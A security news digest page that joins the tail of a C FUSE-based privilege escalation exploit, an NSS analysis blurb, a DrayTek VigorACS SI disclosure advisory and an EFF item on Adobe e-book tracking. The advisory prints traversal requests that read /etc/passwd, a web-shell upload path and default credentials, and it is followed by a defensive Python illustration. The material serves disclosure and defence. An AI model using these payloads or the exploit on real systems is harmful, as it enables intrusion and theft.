    fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,
              op, sizeof(*op), &mountpoint,
              &multithreaded, user_data);
    if (fuse == NULL)
        return 1;

    printf("FUSE initialized.  Time to have some fun...\n");
    printf("Warning: this exploit hangs on exit.  Hit Ctrl-C when done.\n");
    if (fork() == 0)
        _exit(child1(mountpoint));

    if (multithreaded)
        res = fuse_loop_mt(fuse);
    else
        res = fuse_loop(fuse);

    fuse_teardown(fuse, mountpoint);
    if (res == -1)
        return 1;

    return 0;
}

int main(int argc, char *argv[])
{
    sh_fd = open("/bin/bash", O_RDONLY);
    if (sh_fd == -1)
        err(1, "sh");
    sh_size = lseek(sh_fd, 0, SEEK_END);
    return fuse_main_suid(argc, argv, &hello_oper, NULL);
}




Analyzing the Network Security Services Library

Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. It implements cryptographic functions in the Firefox and Chrome browsers, and after a recently found certificate signature verification vulnerability, I decided to take a look at this project too.

more here...........http://www.viva64.com/en/b/0286/

DrayTek VigorACS SI (

Vigor ACS-SI Edition is a Central Management System for DrayTek routers and firewalls, providing System Integrators or system administration personnel a real-time integrated monitoring, configuration and management platform.

-----------------------------------------------------------------------
2.1. Default http-auth username/password used for <ip>/ACSServer/*

We found that most VigorACS SI deployments are using the default HTTP authentication settings (acs/password). This is not so much a software vulnerability as a configuration issue.

2.2 Unauthenticated arbitrary file read/write functionality via UploadDownloadServlet

The UploadDownloadServlet can be used to (read and) write files on the server directly. In addition, this functionality is accessible without having to provide the HTTP authentication details (2.1).

2.3. Path traversal and Local File Inclusion in the FileServlet

The regular expression that is used to prevent this is not sufficient: it removes occurrences of '../' (without the quotes) in a single pass. By providing input like '....//', the middle '../' is removed, while the remainder equals '../'. We could now use the FileServlet to access any file on the server:
<ip>/ACSServer/FileServlet?f=....//....//....//....//....//....//....//etc/passwd
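As an added illustration (not code from the advisory or the product), the following Python reproduces why a single-pass '../' filter fails and shows the defensive alternative: canonicalise the joined path first, then require it to stay under the document root. BASE_DIR and all function names are constructed for this example.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed document root for the illustration; not the product's real path.
BASE_DIR = "/opt/acs/webroot"


def flawed_sanitize(path: str) -> str:
    """Single-pass removal of '../', the kind of filter the advisory describes.
    Each match is deleted once, so the middle of '....//' is removed and the
    leftover characters collapse into a fresh '../'."""
    return re.sub(r"\.\./", "", path)


def flawed_resolve(base: str, user_path: str) -> str:
    """Filter-then-join with no containment check afterwards: the sanitiser
    is trusted, so a surviving '../' walks out of the document root."""
    return posixpath.normpath(posixpath.join(base, flawed_sanitize(user_path)))


def resolve_contained(base: str, user_path: str):
    """Canonicalise first, then require the result to stay under base.
    Returns the absolute path to serve, or None when the request escapes.
    Lexical normalisation only; a real file server should also apply
    os.path.realpath so symlinks cannot point outside the root."""
    base_abs = posixpath.normpath(base)
    # Treat a leading '/' as relative to the root so join() cannot discard base.
    candidate = posixpath.normpath(posixpath.join(base_abs, user_path.lstrip("/")))
    if posixpath.commonpath([base_abs, candidate]) != base_abs:
        return None
    # Note: '....' is just an odd directory name here; it is allowed but
    # resolves inside base rather than being rewritten into a traversal.
    return candidate


def serve_request(raw_f: str):
    """Handler for a ?f= query value: decode once, then check containment.
    Returns (decision, path) where decision is 'allow' or 'deny'."""
    decoded = unquote(raw_f)
    path = resolve_contained(BASE_DIR, decoded)
    return ("deny", decoded) if path is None else ("allow", path)


if __name__ == "__main__":
    sample = "....//....//....//etc/passwd"   # the pattern quoted in 2.3
    print("filter-then-join resolves to:", flawed_resolve(BASE_DIR, sample))
    print("canonicalise-then-check says:", serve_request(sample))
    print("plain traversal says:", serve_request("../../etc/passwd"))
```

The deny branch is also the right place to log the decoded value, since a request whose canonical form leaves the root is a reliable detection signal regardless of how it was obfuscated.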

2.4. Arbitrary file upload in <ip>/ACSServer/UploadFileServlet

This servlet suffers from the same path traversal vulnerability as described in 2.2. You can POST data to this servlet to upload files into arbitrary locations:
http://<ip>//ACSServer/UploadFileServlet?prefix=<URLENCODED('a&....//....//....//....//....//server/default/deploy/web.war/shell.jsp&a&a&a&a')>

The UploadFileServlet appends '.cfg' to the given filename, which means files uploaded via this mechanism are not directly of use to an attacker. However, when the payload is a ZIP archive, the vuln. in 2.5 (Local unzip functionality) can be used to unpack an otherwise benign file into a full-blown remote web-shell.

2.5. Local unzip functionality

The RPC server provides an unzip functionality (rpcmanager.UnZip) that can be invoked by using the AMF message broker (accessible via http://<ip>/ACSServer/messagebroker/amf). This functionality can be used to unzip any file on the file system, such as one that has been previously uploaded using the UploadFileServlet vuln.

2.6. ACS runs as root

The webservice is running as the root user.

-----------------------------------------------------------------------

Timetable:

2014-09-26 : Vendor released patches (private and unverified) to their customers
2014-07-22 : Vendor states that most of the vulns. are patched
2014-07-08 : Vendor notified customers with large deployments
2014-06-30 : Response of Vendor
2014-06-24 : Notified Vendor

Researchers:
Victor van der Veen (vvdveen (at) cs.vu (dot) nl [email concealed])
Erik-Paul Dittmer (epdittmer (at) digitalmisfits (dot) com [email concealed])

- - - - - - - - - - - - - - - - - - - - - - - - - -


Adobe Spyware Reveals (Again) the Price of DRM: Your Privacy and Security

The publishing world may finally be facing its “rootkit scandal.” Two independent reports claim that Adobe’s e-book software, “Digital Editions,” logs every document readers add to their local “library,” tracks what happens with those files, and then sends those logs back to the mother-ship, over the Internet, in the clear. In other words, Adobe is not only tracking your reading habits, it’s making it really, really easy for others to do so as well.

more here..........https://www.eff.org/deeplinks/2014/10/adobe-spyware-reveals-again-price-drm-your-privacy-and-security